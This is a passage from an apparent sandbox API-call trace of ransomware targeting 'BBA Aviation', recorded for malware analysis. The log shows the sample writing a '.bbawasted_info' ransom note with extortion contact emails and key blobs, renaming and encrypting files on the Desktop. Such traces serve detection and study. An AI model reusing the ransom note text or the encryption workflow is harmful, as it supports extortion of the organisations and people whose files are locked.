hTemplateFile=0x0) returned 0x288 [0204.788] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0204.788] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x21d4 [0204.788] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21d4) returned 0x640000 [0204.788] CloseHandle (hObject=0x288) returned 1 [0204.977] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.977] CloseHandle (hObject=0x280) returned 1 [0204.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.977] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0204.978] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.978] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0204.978] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6928) returned 1 [0204.978] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0204.978] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0204.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.988] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cKHjJr9BETTDZfEGe1qUfuMcnmfxi81QuAwMM0bmWYbLtntw0ZiHazzaUPpmmGas\r\nMFIGporDAF5VRmWlvpkauCggQpFzyB84n5xeaS2jdeGSbFV9l6eduK56taqk7PaU\r\nepI5ES03EJbgA13PzlONyLFudNRjzx5xo5dtwR29fLoh1PLz+Z1yNVfhzpooFJEg\r\nQ60Y2uUciMRyFZSwTddrbH/C0ExItS8aFjJd3AHX+6YjEGwdV1LGOeykOQxfrOKa\r\nywr9wbvqZijaYJBPMrKy0NwHWkF5RV4ncA3n+mLh6OQnfchS49DaAyI/kE+ICbAp\r\niPYn3++HJYVP6NLEZ/ADnpJ0LJRqF4ch5czYOsaaGFBvK16oBJq2aSlsNNOKM1p5\r\nTctK1UyS7y5zjR4NCZBbbGmhlJwBE9MGN3uijMRAB/vy+E9LUf9TlqUQXLucfSPx\r\nE07nj1QzaHONZmT/6sxzpxpOFKmXw8F0JS0LmsNAUTzZvNEZeWlxWx8/o5x54Hgd\r\n4WklsXsW2G2ABq3WuhQYz9ZhWCZLzHauLIO56xAA7aUyyEY2BtSrWbByItMcxMY9\r\nGqLSkWLI5Yi/0FY2B9YFH0i+R9nNGvKDh1Xd2OfmqXpEfbYqeyx/+BEFWICwu8mJ\r\nUaC/bthjkA1DeFhGA2pvBRPbCoq4wRLEm44IVF7DiXL=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.988] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0204.988] SetEndOfFile (hFile=0x290) returned 1 [0204.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.991] CloseHandle (hObject=0x290) returned 1 [0204.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0bc8 | out: hHeap=0x660000) returned 1 [0204.997] _aulldvrm () returned 0x0 [0204.997] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0204.997] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0204.997] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0204.997] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\q vx.mkv") returned 41 [0204.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x6adb18 [0204.998] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.998] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a63d8) returned 1 [0204.999] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.999] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0204.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\q vx.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\q vx.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0205.001] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.003] SetEndOfFile (hFile=0x27c) returned 1 [0205.003] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.003] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\q vx.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\q vx.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\q vx.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\q vx.mkv.bbawasted")) returned 1 [0205.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\q vx.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\q vx.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0205.004] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0205.005] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x2b70 [0205.005] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b70) returned 0x640000 [0205.005] CloseHandle (hObject=0x290) returned 1 [0205.050] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.050] CloseHandle (hObject=0x280) returned 1 [0205.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.050] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0205.051] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.051] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0205.051] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0205.051] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0205.051] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0205.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.224] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dZT8x9T1cxA55CdXdO8GyMDCtaxARZGOoIecIvUlqBEA+7GH2/Nn7xNwd2gLpd9R\r\nydlyU6dAQLBOFDT7j+e0sy01KSYytZhSXDb+NsoKUzRjNEFhE0K1gfBwy0BVmBLQ\r\nqnwNW9ns204pqus/cCb9v5tWOpEkLkIq7lKxQ4LiD4haRYj+f0FZ32FoFZETeIzF\r\n2FRTY9nQD0r758ALumYm5XgB3RyAFqUKfK5WuIEoR8n93fXa35DMUCSqSJWdRdUs\r\nfd7wYspZSMBq7flgEV12EhNRxvwxkSh5672DK0BKijJ6jp90cSxW4/Gs1Zk8xhUZ\r\n2yFTY4cPAP9jt1F9Gb+nObIf9haLBMq0ohRen9+SYc64iyZPxrIrcE1SYc/9ASIF\r\n0nthTfgQZdRXM9GUAPZ6K3ZpXi5oJtCsKlw7Psivulh+SJwWbI0fUa9TQGTK7c4X\r\ngbCSId9KOjgiBugusIXcFXhQGygjy7YQ1HXEahGhl/og22IBHoAbMrgdnM0Ur4O4\r\nW578+51bLqJGKhy01ZeRexLHsQXABYdm2VQSwCsygPM/JLZ/wZaikVKFDhQ3J6fR\r\nBnA5EF37wllAzyx17Zd8Aw1rdWhAh/3cAgxTqq7fAYow/dUNIXUvvPn3J/vKyBH1\r\nGC6oV9QmEVh1bCtWST+f070qcvv0tqJjj9LkPGz5BGf=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.224] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0205.224] SetEndOfFile (hFile=0x27c) returned 1 [0205.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.227] CloseHandle (hObject=0x27c) returned 1 [0205.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0205.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a44b8 | out: hHeap=0x660000) returned 1 [0205.232] _aulldvrm () returned 0x0 [0205.232] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0205.233] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0205.233] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0205.233] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\y-wlGGDysKeKP8qrp.avi") returned 54 [0205.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0205.233] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.234] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0205.234] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.234] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0205.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\y-wlGGDysKeKP8qrp.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\y-wlggdyskekp8qrp.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0205.235] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.236] SetEndOfFile (hFile=0x27c) returned 1 [0205.237] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.237] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\y-wlGGDysKeKP8qrp.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\y-wlggdyskekp8qrp.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\y-wlGGDysKeKP8qrp.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\y-wlggdyskekp8qrp.avi.bbawasted")) returned 1 [0205.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\y-wlGGDysKeKP8qrp.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\y-wlggdyskekp8qrp.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0205.238] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0205.238] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x5d8b [0205.238] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d8b) returned 0x640000 [0205.238] CloseHandle (hObject=0x290) returned 1 [0205.245] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.246] CloseHandle (hObject=0x288) returned 1 [0205.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.246] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0205.247] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.247] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0205.247] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0205.247] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0205.247] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0205.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0205.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0205.419] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]p9ZFTYEGZyq1TiRCngqBC/hx9pMx+bcW2RI4LrbX/PPN9DB3mEaEMxc+wb95ETyy\r\nZ/y9PmWPan3/nqlM5tIaYMVj4j26LgRD+NK6CMmfPKraA3/aW+BO17CW0y1WjvpQ\r\nezmc6Q9QSv3RDqzLYFdM+pTgFzusRnILvpfDoqDtTAT1t3MLbu7Oij1OjXp/D5oh\r\nbTMTrbd9aj8OmnrMTjAfxjHwhx5NwigaPy9P8M/BbFSD66meuQcLbEOrucCtkRAS\r\nIduYVWM4sDvFgec/swMCs1eBiydIZnWkqkmdGofRy0fE56ZNIdo31syXiI3JGTad\r\n15x5EzoPnIbZDmjQOBJr7z4VkItxdkFgYD2jk8y1VaaYBqTzY36y8LpNqZxRH6b/\r\ngTeCSkqDnbOUASKGQtcYobpnA7egcerXSb2yD/7CZjIH40wGB9O0vConeeDpiRBm\r\nP+Rj1g+gCffyzxBIUfpWVODK6NJp+lM0KP7iVHH1s7gojkc2Na7RGvsMNvaL7wBo\r\nDWCr0A4xJw9A8WJNjRV3uolotjWCP/gBYvAIR7OVBnHwzGCS6WJqtul4nOhoK0kF\r\nQ8LZm0hc2EqtKE45y6yYYHUfSrO+zw80EyTg8qQZTxV6sO4IDKkwckRRsEgxuito\r\nLminX4fHzVDc+npwPB3pnyMIB23V13SAZe/oo2DXNX/=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0205.419] WriteFile (in: hFile=0x27c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0205.420] SetEndOfFile (hFile=0x27c) returned 1 [0205.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0205.422] CloseHandle (hObject=0x27c) returned 1 [0205.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0c90 | out: hHeap=0x660000) returned 1 [0205.436] _aulldvrm () returned 0x0 [0205.436] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0205.436] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0205.436] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0205.436] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\As4kVW3Om-6GF.flv") returned 45 [0205.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6c4b88 [0205.437] lstrcpyW (in: lpString1=0x6c4be2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0205.437] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0205.437] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0205.437] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0205.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\As4kVW3Om-6GF.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\as4kvw3om-6gf.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0205.440] WriteFile (in: hFile=0x27c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.441] SetEndOfFile (hFile=0x27c) returned 1 [0205.441] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0205.442] lstrcpyW (in: lpString1=0x6c4be2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\As4kVW3Om-6GF.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\as4kvw3om-6gf.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\As4kVW3Om-6GF.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\as4kvw3om-6gf.flv.bbawasted")) returned 1 [0205.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\As4kVW3Om-6GF.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\as4kvw3om-6gf.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0205.443] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0205.443] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x4783 [0205.444] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4783) returned 0x640000 [0205.444] CloseHandle (hObject=0x290) returned 1 [0205.447] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.447] CloseHandle (hObject=0x288) returned 1 [0205.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.448] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0205.448] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.448] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0205.448] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0205.449] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0205.449] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0205.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0205.460] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE 